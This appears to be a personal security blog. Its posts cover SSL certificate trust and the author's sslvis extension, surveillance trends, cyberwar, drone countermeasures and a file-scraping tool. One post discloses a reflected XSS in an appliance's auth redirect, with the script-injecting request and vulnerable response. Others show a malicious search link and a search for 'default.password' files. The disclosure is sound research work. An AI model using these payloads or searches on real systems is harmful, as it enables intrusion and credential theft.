#2 - highly homogeneous systems deployed into production can fail spectacularly. relatively survivable critical systems like DNS root servers are deployed on varying hardware and software to avoid this issue. once the JSF becomes the mainstay fighter of western nations, then a similar 'vulnerability' could theoretically disable entire air forces. don't worry, all JSF code is written in C++ (wikipedia) so there won't be *any* software induced failure points... lulz...


ps: speaking of crappy code and fragile software, i recently discovered that the back-end of sslvis is b0rked. i'll be getting it fixed up, getting features added to the back-end, and moving it out of beta as soon as i can... sorry!!

Thursday, October 7, 2010

recent NSA history via Nova

some crazy tidbits in there... notably lacking in any conspiracy-foo... pbs ftw! :D

haha, so i can't embed hulu here? whatev....

http://www.hulu.com/watch/182504/nova-the-spy-factory

Wednesday, August 4, 2010

strategic subversion?

<ramble>

my boy @zenfosec was schoolin me on kung-foo flix the other day, and we got to talking about how blue-ray rips and dvd capacity seem to line up and then started wondering about how long until we see previously unknown brands of cheap electronic media players at superstores which can play the format in question... (now?)

anywho, one might observe that 'traditional'/mainstream/'western' manufacturers don't produce these devices but capitalist markets fill consumer demand in this area.

one might also observe that a significant number of rip nfo files appear to come out of china.

that could lead into speculation of whether or not a socialist culture that reportedly 'thinks' in terms of centuries and longer might make a conscious effort to undermine capitalism by using capitalism against itself...?

this might be in line w/ the idea of mass producing offensive infosec 'armies'. btw, i am very disappointed that the talk about this field outta taiwan got pulled from bh/dc. if anyone wants to share the slides, hit me w/ a gpg key ;) (also, i got to chat w/ some super smart folk in vegas n learn some nifty stuff, props to everyone involved :)

anyway... insofar as unintended consequences and blowback, it might be fair to ask if this would be a risky strategy. when a traditional soldier is discharged and leaves his barracks he gives back his primary weapons. if you imagine forward a couple decades to legions of retired technically capable trained electronic 'subversives'(?), what will the world look like to political powers seeking to control information? lots of shades of grey in there prolly ;)

</ramble>

greetz n 敬 to peeps w/ comments n the operanos chillin in the back too ;)

Wednesday, June 23, 2010

privacy trends

[premise]
the ability to collect and process massive amounts of information allows for a world where anonymity is minimized


[tracking]
i thought i remembered reading that investigators used public surveillance camera data to back-trace the craigslist killer philip markoff, but a quick glance or three at google didn't confirm that at all...

either way, the same idea played out in the whole dubai / mossad deal. cameras are all over, and if you have access to a lot of them you can start traveling back in time in a sense, back-tracing an event in your observable realm...

schneier has pointed out at length that to-date facial recognition false-positive rates render such systems ineffective. but anecdotal evidence suggest a different story when human analysts can quickly review large sets of public video data.

dubai wants more cameras, and technology drivers are expressing interest in mass video collection for further automated and auto-augmented manual analysis.

uav technology is already migrating to law enforcement applications... military developed gunshot detectors have been deployed as well. military style surveillance technology appears to be integrating into daily life relatively quickly.

automated license plate detection technology is growing, and in some places police have real-time access to computerized records which include details beyond court convictions or even incidents where a court was involved.


[physical evasion]
this brings up the whole issue of evasion. in theory tech like this could be expanded to cover more than faces. i hear there are higher grade cameras that filter IR, so this isn't entirely reliable, but then most cameras will be cheap. then there's also the fact that a white shiny blob of a person walking around might attract attention to humans and robots watching the video feed. it might be effective if employed w/ some planning as to when it is activated, and might be augmented by employing physical disguise as part of the plan if you wanted to be concealed moving to and from a location.

a more nifty technique would be lens detection and targeted energy overload of cameras (possible?), but beware false positives from peoples eyes ;) also, the wake of camera failures would be an alarm that something was going down and where it was happening


[secure comms]
there really are rooms where government agencies are sucking up massive amounts of data (presumably including voice data routing over digital transports) which are apparently important enough to invoke 'state secrets' to defend. it seems like major voip providers like skype are cooperating by giving states access to at least targeted conversations. and there seems to be industry enough to support manufacture of ssl mitm devices.

as an aside, big ups to moxie for releasing the redphone app to re-give average people the ability to have a semi-anonymous phone conversation. a friend and i were in the planning stages of a similar app built, but that damn moxie clearly had more motivation, time, and ability ;)

anywho, after september 11 2001 a US lt colonel and others stood up to talk about able danger, which was a mass data-mining and information processing effort. it takes approx 16-22 years of service to attain the rank of lt colonel, so after the government says "we don't know what he's talking about" and there are claims that evidence disappeared you've kinda gotta ask "are these people crazy to fuck up their lives for 15 minutes of fame, or does the government maybe have some interest in hushing the capabilities of massive data analysis...?"

the book 'the rootkit arsenal' calls full packet capture the worse-case scenario for a root-kit operator. you dig? collecting tons of information gives you significant potential detection capabilities.

anecdotal evidence indicates that anonymous voice and data connections may not be readily available as services you can purchase.


[wikileaks / nation-states]
so we get to a place where the founder of a site dedicated to exposing information inconvenient to massive entities is apparently laying low from a nation-state...? according to da twittaz one of the last people he was seen with was valarie plame... at first i was thinking she was sibel edmonds, but all these covert secret conspiracy women just had me all mixed up ;)


[identity]
so there's always a weak link somewhere... and it seems to me that in a world where automated detection and tracking is growing, the weak link might be identity. if you can build ghost identities you can travel and exist in anonymity so long as you don't make anyone notice you, much as humans have been doing far into our past... but if you only have your natural identity then many of your words, motions, and actions may be available for later analysis to an interested party.

information may want to be free, but it seems some people want to horde it...

Thursday, May 27, 2010

novel(?) anti-xss technique caught my eye

saw this a few weeks ago, and it stuck out b/c i'd never seen or heard of anything like it... i ran it past a few peeps i respect and they'd never seen it, so i figured i'd share :D

it's very common to find XSS in search functions on web apps where the text a user enters into the form is reflected onto the page after the form is submitted. so you hit an app and search for "foo" and on the search results page you get back the search form is populated with "foo" which you just searched for. well if someone constructs a malicious link like:

http://someapp.somedomain.edu/search.htm?q=foo"><script>evil code here...

you end up w/ an xss attack assuming the app is poorly written...

typically during web app assessments you've gotta go smack the developer and tell them to validate their inputs and encode their outputs, but this time it took me a minute to figure out what was going on... sooooo here's the resulting html src of a little PoC i put together and tested w/ google app engine and ff3.x:


<html>
<head>
<title>xsstest</title></head>
<body>
<center>
<form name='testform' action='javascript:alert(testText.value);' id='testform'>
<input name="testText" id="testText" tabindex="1" onkeyup="javascript:alert(this.value)" />
<input type="submit" name="btnTest" id="btnTest" value="testfoo" onclick="" />
</form>
</center>
</body>
</html>


so wtf is that? ok, this was based on a search form on an ajax-ish web app. there was more to the real app, but this includes all the relevant bits. when i searched on the app, i saw my inputs were reflecting in my browser so i went to check if they were html encoding them server side... but the value i was inputting in the search field never showed up in the page src... ermm, wot?

well, here's what i think is happening:


<input name="testText" id="testText" tabindex="1" onkeyup="javascript:alert(this.value)" />


note that the "value=" tag is missing above. that makes the value attribute null when the server first serves it. when you use the form the app acted on your inputs using stuff like onkeyup/onkeydown, but when the user data needs to be read, it's done using the object oriented "this." convention which allows an object to refer to itself.

when you submitted the form the app would process your inputs, but the actual value you enter is never written to the page by the server. it exists only in memory on your client machine and is never written into html src. when the page refreshes your client browser renders the input element and snags the 'value=' value from memory and thus seems to avoid those pesky output encoding issues...?

anywho, it looks legit to me, but it's not a game changer or anything. kinda limited in it's application, and doesn't do anything for sql injection, csrf, etc.

but still kinda nifty mb ;)

Friday, May 7, 2010

rwnin@firefox-extension: ./sslvis -h -vvv

[sslvis: firefox extension]
https://addons.mozilla.org/en-US/firefox/addon/158232/


[background]
iirc, the basis for a lot of security assumptions on the modern intert00bz come down to everyone trusting that the CAs will keep their promise to not issue bullcerts (technical term: bullshit certificates).

but it looks like they are issuing them to governments and intelligence agencies:

http://www.wired.com/threatlevel/2010/03/packet-forensics/
http://arstechnica.com/security/news/2010/03/govts-certificate-authorities-conspire-to-spy-on-ssl-users.ars


[not to be a bitch]
i mean, in theory all important comms should go over crypto that you manage and trust... and this can be used for 'good'. but that doesn't change the fact that most people use these communication channels for a variety of reasons with an expectation of near absolute privacy.


[so the theory goes]
they are hunting someone using 'secure' public inet services and wanna do a targeted interception or run some pattern matching on a network near afghanistan to find someone. so they do a network level tap on a choke point in the networks serving the region.


[and?]
the CAs gave em a valid cert, so they plug in their device and they're doin cleartext intercepts on everything going through that region. the cert is valid, it's made out to google or sekritbadguylayer.com or whoever.


[massive qualifier]
so do you think that cert the CA gave some snooping party is an exact match of the legit cert of the one running in production?

i'm gonna guess no for the following reasons:

1) the CA would be completely destroying the trust model (bad for business) if they couldn't revoke the certs
2) maybe they simply can't reproduce a cert they issued because data wasn't kept or conditions can't be reproduced (?)


[not my idea]
hashes are just dang hard for people to pay attention to, cause they're huge random strings. but a few years back at bh/dc someone (kaminsky? ranum? sober? no...) was talking about how you can visually represent that same hash value as a series of colors, and all of the sudden it's really easy for humans to notice when a hash changes.


[soooo]
boiling a hash into a word is what sslvis does, and it's a very similar concept. if you hit gmail one day and your word is 'paradox' when it always used to be 'apple' you can easily notice that those words have changed. normally you wouldn't be alerted to the change because there are no warnings or indicators for changes to another valid cert.


[verification?]
there may be a completely legit reason the cert changed. certs expire, disks fail, load balancers exist, devices change, etc etc etc. that's why sslvis sends the host, domain, tld, and hashword value to an external app server:



the default server is hosted on google app engine and feeds the info into a tagcloud:



it includes a (crappy) search feature which let's you visualize the proportions of the certs other people are seeing in real-time. it is slated to include clouds which show the results over time (vapor tagclouds atm ;).

so if your google word is paradox, and that's what everyone else is seeing for the last hour, you're prolly ok to feel kinda sorta mb privatish... kinda...

but if your google word is paradox and there are no other results or just a couple others there is a stark visual cue in the juxtaposed sizing in the tag cloud... this let's you know you're experiencing an anomaly in your connection, and mb you shouldn't proceed...?



in the img above, it looks like maybe a non-malicious anomaly, since canvas is the normal word for www.google.com from what i've seen... (should prolly implement a word search function)


[communist socialist conspiracy?!?!]
well it kinda democratizes and visualizes the whole CA trust issue. a sort of sunshine for crypto maybe? again, not a new idea...


[sidenote]
what about wildcard ssl certs? in theory this detects them too...?


[erm, privacy?]
yea, there is a definite loss of privacy here. but before anyone rants about it, you kinda need to understand that there are rooms in major network facilities where state actors are tapping massive networks on a massive scale. the fact that you go to ilovefarmanimals.com or someshadysite.com is already potentially known to a potentially interested party, even if the details of what you are doing are hidden in the SSL channel.

oh, well that and you can use regexp exclusions or just disable reporting. by default rfc1918 networks are excluded. a trailing asterisk let's you know that a value wasn't reported.

also, you can choose your remote reporting server in the extension options and the source is available so you can just light up one for your own network (and/or just write your own interface to capture the data, it's just a couple HTTP GET parameters).


[what else can it do?]
well, if you capture ip information you track and geo-locate anomalies in near-real time... that could be kinda cool i think...

it would be pretty easy for the app to report back to your browser that your result is way off from the current norm and actively alert you somehow...?


[kludges?]
well... erm... a lot... but right now the data is exported via xmlhttp requests that fire each time you change focus on the tab, and not for each actual request you make... firing on each request also kinda sucks for sites with frequent requests. keeping tabs on what requests are made and how often is probably the way to go.

(btw, i use a secondary xmlhttprequest because you can't read the public hash for an active connection from javascript easily afaik)

there are more kludges... check it out for yourself, i'm def open to suggestions ;)


[downsides]
you're losing (a ton of) entropy, so there's an increased chance an attacker could find a collision and be really tricky. right? a bigger wordlist and highly efficient hashing algo helps there mb...? it might make sense to just report the actual hash back to the server, or pass it as a sanity-check parameter. not sure what (if any) privacy ramifications that might have.

also the app currently has no anti-fraud capabilities. rate-limiting prolly makes sense server-side, and client-side the user could be subjected to some captcha-esk process that issues a cert to check for humans vs cylons.

the app is currently cleartext comms, so a mitm could mitm you when you use it ;)

oh, and this is all only works if the snoopers aren't getting exact copies of certs, either from the CAs or from a compromised certificate store.


[other?]
there are some bugs and unimplemented features... and the app is still in the sandbox since i'm not done testing and adding features.


[coda]
that's all... for now... :)

Monday, April 19, 2010

why it sucks to be an infosec defense guy & an example of real-world cyberwar

i got a chance to listen to Richard Clarke talk w/ Terry Gross on Fresh Air today, and while it was full of a lot of the things that suck about listening to mass-media talk about infosec, there were definately some gems...

i'd say it's worth a listen... anywho, onto the content:


[why it sucks to be an infosec defense guy]

@ 02:20

"somehow from a thumb-drive, a virus a worm got into the classified network, which is supposed to be a closed loop network, of CENTCOM and attacked compromised thousands of computers of our warfighters in Iraq and Afghanistan and probably exfiltrated large amounts of information to someplace in the internet [in December 2008]"

ok, so this blurb says two things to me.

1) "it attacked an infected thousands of computers on a closed-loop network" - here's a lot of assumption, but when i hear about worms spreading in closed networks, it makes me say 'oh you didn't apply security patches to those machines because you thought they were safe'. unless this thumb-drive was full of 0day, this incident is classic failure to follow best-practices because you assumed some other layer of defense would keep you safe.

2) and wait, was this "closed-loop" network airgapped? well, clearly it wasn't if you were able to exfiltrate any data out of it to the internet. and even if it wasn't an airgapped network, why the #@%(*@#%* are you letting this classified military network which supports men & women with guns TALK TO THE INTERNET?!?! srsly guys, you know firewall policies can be set to block traffic leaving your network too, right?

this kind of stuff just sucks. here you have a network which should be one of the most secured in the world, and has tons of resources dedicated to protecting it, and it falls flat on it's face w/ two well known best practices. when .mils aren't doin this stuff, you know that corp networks are probably worse. how can you tell me to help protect you if you're unwilling to patch and control your network? and you're surprised when bad things happen to you? srsly?

we know how to do so much good defensive stuff, but it's a lot of mundane process and procedure. it takes cycles and people, and it takes some documentation and training, some audit and enforcement, and it takes some effort and work. and it seems like no one is doing it... booo :(

oh well... c'est la vie


[an example of real-world cyberwar]

as a bonus...

remember when Israel bombed some secret facility in Syria? well, according to Clarke, that attack was performed by Israeli F-15s and F-16s which are very not-stealthy fighters. so a reasonable question is why weren't these planes shot at/down by Syrian air-defense networks?

according to Clarke, the Syrians saw nothing on their radar at the time and after the fact because "the Israelis had used cyberwar as part of a traditional attack. They had taken control of the Syrian air-defense system, and made all of the radars look like there was nothing in the sky, even though the sky was filled with Israeli fighter-bombers."

anyway, just wanted to include this because so many people in the infosec game seem to think that cyberwar can only be a digital-pearl-harbor type catastrophic attack. as if the entire attack will be encompassed by bytes on a wire. in my opinion cyberwar capabilities can be used effectively as a small part of larger tactical engagements. dismissing cyberwar as a fantasy ignores real-world realities and capabilities which are apparently being put to use today by state actors, and possibly others...

Friday, March 5, 2010

more xss introduced by security devices

soooo, i found this a while back, and it may be patched or who knows... but i (re?)'rediscovered' it n kinda had to be snarky n vocal about it... such a surprise, i know ;)

it's kinda similar to the xss introduced by an intermediate security device post from a bit back...

i see a little light-weight web server i'm not familiar with, and kinda assume it had to be made in the last i donno... 10 years? so these guys who made it are sitting around a table and they're like:

"hey, let's make (or buy) this simple http server that just does some simple stuff really well and *nothing else*, and use it as a workhorse for these expensive widgets we want to sell!"

and later, someone says:

"man, we need a simple http server to run this security service that authenticates unknown users" and they build it into a security-ish widget...

an unauthenticated user requests a page:

GET /somethin.aspx?foo=bar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld

...



and the little server that could redirects them to authenticate:

HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...

<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/somethin.aspx?foo=bar"></HEAD></HTML>


of course the server encodes the output reflected in th-...


GET /somethin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; ...)
Accept: */*
Pragma: no-cache
Host: somehost.domain.tld

...


HTTP/1.1 200 OK
Server: ********gw
Content-Type: text/html
...

<HTML><HEAD><TITLE>***********************Authentication Redirect</TITLE><META http-equiv="Cache-control" content="no-cache"><META http-equiv="Pragma" content="no-cache"><META http-equiv="Expires" content="-1"><META http-equiv="refresh" content="1; URL=https://an.auth.svr/login.html?redirect=http://somehost.domain.tld/sometin.aspx?foo=bar"></head><body><script>alert('wot?')</script></body>"></HEAD></HTML>


you've gotta wonder... how many code releases and updates has the server gone through, since... ummmm.... 2005? You know, have you thought about output encoding in the last *5 years* since an xss worm made headlines w/ mainstream media? how much revenue did this bring you in the last 5 years? annnnnd how much is a simple static or dynamic analysis?

that's not to say that this looks wormy, for a couple of reasons. plus, modern anti-xss filters seem to protect against it.

one interesting bit is that the redirect values are completely arbitrary and seamless in the browser, which mb makes a targeted attack easier because the victim URL can be anything...?


***note: the vuln here is _not_ in msnbc.com***
***another note: ie8 anti-xss filter disabled for this screenshot***

other than that, it doesn't look like anything terribly special really, and someone has prolly already posted somethin about it somewhere, cause you just kinda trip over it if get within 30 feet of the server...

anywho, that's all for now ;)

Wednesday, March 3, 2010

flash is dead... long live... *yawn*

well html5 has been rumbling around and 'maturing' for a while now...

i was recently introduced to the youtube html5 beta via fark iirc (linkfail). anywho, the article quoted some steve jobs flash/ipad/drama foo, and also included some nice quotes about epic flash failure from charlie 'i pwn n00b devs in my sleep' miller XD

sooo, throw a supported user-agent to youtube annnndddd... fail. firefox supports html5, but only some open video format, yada yada yada...

wellll, i wonder if there's anything interesting in the youtube src?

<snip>
<script type="text/javascript">
var yt = yt || {};
yt.preload = yt['preload'] || {};
yt.preload.start = function() {
var img = new Image();
yt.preload.VideoConnectionReference = img;
img.onload = img.onerror = function () {
delete yt.preload.VideoConnectionReference;
};
img.src = 'http://v18.lscache2.c.youtube.com/generate_204?ip=0.0.0.0&sparams=id%2Cexpire%2Cip%2Cipbits%2Citag%2Calgorithm%2Cburst%2Cfactor&fexp=904020%2C902306&algorithm=throttle-factor&itag=34&ipbits=0&burst=40&sver=3&expire=1267621200&key=yt1&signature=7A4D3513CEE589B3E53529C08C6BDEA27DF80C1F.96F3E4606263CB33E9198662204B49FD2E4B98F7&factor=1.25&id=92e467b5ad5ad0bf';
img = null;
};
yt.preload.start();
</script>
</snip>


soooo, i know *nothing* about html5 atm, but that's what jumped out at me...

scripts with interactions on the network layer, some id-foo, expire-foo, and key-foo... sounds like an interesting attack surface at a minimum ;)

i'll confess i downloaded chrome to try out the html5 vid... i'm glad i did for the new spinny loading graphic and this epic quote:

'all the bugs have been worked out of flash'
- @pzembashis


(btw, nice work misrepresenting html5 support in browsers pal :P [jkjk!])

lulz... anywho, security aside, sry steve jobs but my cpu wasn't very happy even w/o fullscreen... and man, to think these people are trying to go against flash w/ chop like that, ick :-\

prolly some interesting stuff to find in the rfc-ish linkage...?

Friday, February 5, 2010

datapyning (tool release)

okok, i'm always writing stuff and never getting it released, so this time i've kludged up a tool and dropped it on google code:

http://code.google.com/p/datapyning

just a little python script that will query search info (to google atm, others in next rev) and pull down all the returned results. the idea is to allow you
to collect files/data en-mass and store it away for further analysis later...

[purpose]

so is there any security relevance here? well i built the tool to archive data for a security research project i've been kicking around. i see it being useful for a variety of research and information discovery tasks, but i donno if anyone else will.

ultimately, the idea came from me trying to find some info i'd seen before and coming to the conclusion that the data had poofed into the aether. if you aren't archiving information you care about, is anyone else???

this tool might help you archive some of that data for your purposes...


[examples]

~ grab up to 20 PDFs posted in the last week w/ the search phrase 'free', verbosely

[user@box datapyning]$ ./datapyning.py -S ./null.list -n 20 -f pdf -t w -s free -v

~ grab up to 100 .xls files in the last year w/ .com, .org, and .net domains w/ search phrase 'profit' quietly into a dir called foo

[user@box datapyning]$ ./datapyning.py -f xls -t y -S ./small.list -s profit -q -d foo

~ grab up to 100 results from the last 24 hrs for each tld w/ the search phrase 'default.password'

[user@box datapyning]$ ./datapyning.py -s "default.password"


[limitations]

* searching for -s 'foo bar' makes google barf, but -s 'foo.bar' works... wtf, mah bad, def on the list to get fixed :(
* other 'advanced' search features (intext:, etc) aren't accesible via cli and mostly not through the search phrase
* currently the tool kinda expects search frequencies >= 1 per day (result dir contains dirs named by search date)
* search domains/sites aren't handled on the cli (files w/ crlf delimeters only)
* max of 100 records per search
* no status bar for larger downloads (it will timeout, make note, and move on if d/l fails)
* no rate limiting, sooo it will use the bandwidth it can
* not sure if the way download file names are genericized and logged makes sense
* tied to google (but potential for either modularized search providers or mb search agnostic)

Tuesday, February 2, 2010

snail-mail-fail

hey lookit, important tax-return document in the mail... wazzat w/ the top of the envelope?



erm... umm... wot?



sighhhhh.... yea, those current number fields aren't blank... fuggin wonderful...



so there's an IRL infosec attack in motion... i'll speculate local postal carriers couldn't harvest enough numbers to make it worthwhile... maybe a USPS mail distribution worker, or someone in the mail or finance dept of Chase or whoever produces their mailers...?

Wednesday, December 30, 2009

countermeasures for command & control

~irl blue skies sec post~

been sittin on this for a bit, and the recent predator security issue is a great place to start.

[recap]
a year ago militant gear was discovered with predator video feeds. aquire satellite dish, point up, download software, and *poof* record yourself some killcam videos... kinda like snoopin on webcams... ;)

turns out the vuln was known for about a decade. (incidentally, in bosnia in 1998 seals reportedly used a remote controlled plane with recon gear to hunt their quarry. this is the earliest squad level military uav activity afaik, and the dates lines up pretty nice... can you imagine what toys those guys use today?)

oh, and the vuln exists in tons of military devices, including many items which have been mass produced and widely deployed... whoops...


[erm, wot?]

well, lots of "similar" civilian devices have similar utter failure in the network security realm (voip phones or printers anyone?)... some people feel that fixing vulns like this is paranoid, and they aren't likely to be exploited. well i guess someone trying to blow you up is pretty damn motivating...


[lesson learned?]

rapid prototyping software without a clean upgrade path for fixing these potentials issues is a recipe for failure. also, desperation drives innovation (evolution in action in this case). and fix it in the field can bite you in the ass...


[back to the point]

there are lots more remote controlled and automated devices nowadays... some are pretty wicked in kinetic situations, and others are more passive... some are pretty small, or tiny, some are big, and some have guns. some can jump... some are being used in civilian areas as well (some people protest in humorous ways). some just keep on going.

oh, and militants use them too...

yea, researchers are growing remote controlled bugs... and they mimic bugs and nature too...

so clearly there's a lot of activity and nifty/scary tech in the space...


[attack surface update]

pulling the operator physically out of the loop means that network comms are somewhat more critical and vulnerable than before.


.:location:.
jamming a gps bomb doesn't make tons of sense because the military and spooks have plenty of options in that space. but do smaller and widely deployed surveillance devices and attack platforms using gps utilize anti-jam gps technology?


.:communication:.
how many smaller drones are vulnerable to standard RF interference and jamming? small powerful jamming devices might be able to create a small null zone where remote operated devices are unable to maintain comms with their operators.


.:sight:.
drones generally rely on digital cameras, which begs the question if they can be dazzled and disabled by lasers or strong infrared light sources, a la michael westen

also, thermal cameras seem very common, so i wonder if there are any effective thermal countermeasures? that seems difficult, but who knows...


.:detection:.
can the c&c comm traffic be detected in general? is it possible to cheaply monitor likely radio bands for encrypted (or not) network traffic to alert on a suspected drone presence? or is background RF too much here? if you can detect the c&c traffic, can you get directional information similar to passive radar?

and can the cameras used by visual surveillance platforms be detected (trivially?) like sniper rifle lenses?


.:destruction:.
at least one drone killed itself when a transmission triggered an auto-shutdown procedure, which sounds like there was no authentication on that particularly vital command option... (different than the reported russian take on self-destruct mechanisms...)

and can effective small (and safe) EMP generators be used to knock out nearby drone and surveillance devices? no idea on ranging, or directional vs bubble... no idea if a pulsing emp could be used to maintain a safety zone (and would it be practical considering you'd be frying any nearby electronics of your own, right?)


[anywho]

ultimately, it seems likely that smaller drones will have cost and power-utilization pressures which increase their vulnerability to attacks on their comms...

kinda rambled a bit, but hope you enjoyed it...